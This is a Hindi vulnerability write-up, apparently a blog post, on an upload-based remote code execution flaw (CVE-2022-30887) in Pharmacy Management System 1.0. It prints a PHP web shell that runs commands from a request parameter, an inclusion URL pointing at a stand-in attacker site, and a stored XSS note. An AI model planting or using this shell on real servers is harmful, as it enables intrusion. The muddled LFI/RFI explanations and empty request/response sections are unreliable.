
CVE-2022-30887 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो फार्मेसी प्रबंधन प्रणाली 1.0 में फ़ाइल अपलोड के माध्यम से दूरस्थ कोड निष्पादन प्रदर्शित करता है, शमन मार्गदर्शन के साथ।
यह एप्लिकेशन Mayurik द्वारा बनाया गया है PHP में फार्मेसी प्रबंधन प्रणाली परियोजना को सुरक्षा और प्रबंधन के माध्यम से फार्मास्युटिकल स्टोरों की सटीकता और दक्षता में सुधार के लिए विकसित किया गया है। संक्षेप में, यह एक उत्पाद इन्वेंट्री एप्लिकेशन है।
Pharmacy Management System v1.0 में घटक "/php_action/editProductImage.php" के माध्यम से एक रिमोट कोड निष्पादन (RCE) कमजोरी पाई गई थी। यह कमजोरी हमलावरों को एक तैयार की गई इमेज फ़ाइल के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है।
फ़ाइल अपलोड कमजोरियाँ आमतौर पर एक ऐसी कमजोरी होती हैं जो एक स्क्रिप्ट को चलाने की अनुमति देती है। यह तब काम करती है जब हम फ़ाइल को सर्वर पर अपलोड करते हैं और अपलोड की गई फ़ाइल पर एक कमांड दर्ज करते हैं। फ़ाइल अपलोड कमजोरियाँ दो प्रकार की होती हैं;
यह कमजोरी तब होती है जब सर्वर पर मौजूद लोकल फ़ाइलें उपयोगकर्ता से प्राप्त फ़ाइल को शामिल करती हैं। उपयोगकर्ता से प्राप्त मानों को सैनिटाइज़ किया जाना चाहिए।
LFI (लोकल फ़ाइल इन्क्लूज़न) का उदाहरण;
<?php
if($_REQUEST['s'])
{
system($_REQUEST['s']);
}
else
phpinfo();?>
यह कमजोरी तब काम करती है जब हमलावर किसी रिमोट सर्वर से मैलवेयर अपलोड करता है।
RFI (रिमोट फ़ाइल इन्क्लूज़न) का उदाहरण;
"www.victim_site.com/abc.php?test=http://www.attacker_site.com/attack_page"

php शेल स्क्रिप्ट का उदाहरण;
<?php
if($_REQUEST['s'])
{
system($_REQUEST['s']);
}
else
phpinfo();?>
रिक्वेस्ट;

रेस्पॉन्स;

रिक्वेस्ट;

रेस्पॉन्स;


साथ ही यह कमजोरी एप्लिकेशन पर अभी भी सक्रिय है।
उसी पेज "editproduct.php" पर, मुझे स्टोर्ड XSS मिला
$sql = "UPDATE product SET product_name = '$productName'"
इस कोड ब्लॉक में आप डबल कोट्स (") के साथ संदर्भ से बाहर जा सकते हैं



मुझे उम्मीद है कि मैं बता पाया हूँ कि फ़ाइल इन्क्लूज़न कमजोरी कैसे काम करती है, कौन सी या किस स्थिति में यह कमजोरी ट्रिगर होती है और हमलावरों से इस हमले को कैसे रोका जाए। आपके बहुमूल्य समय के लिए धन्यवाद।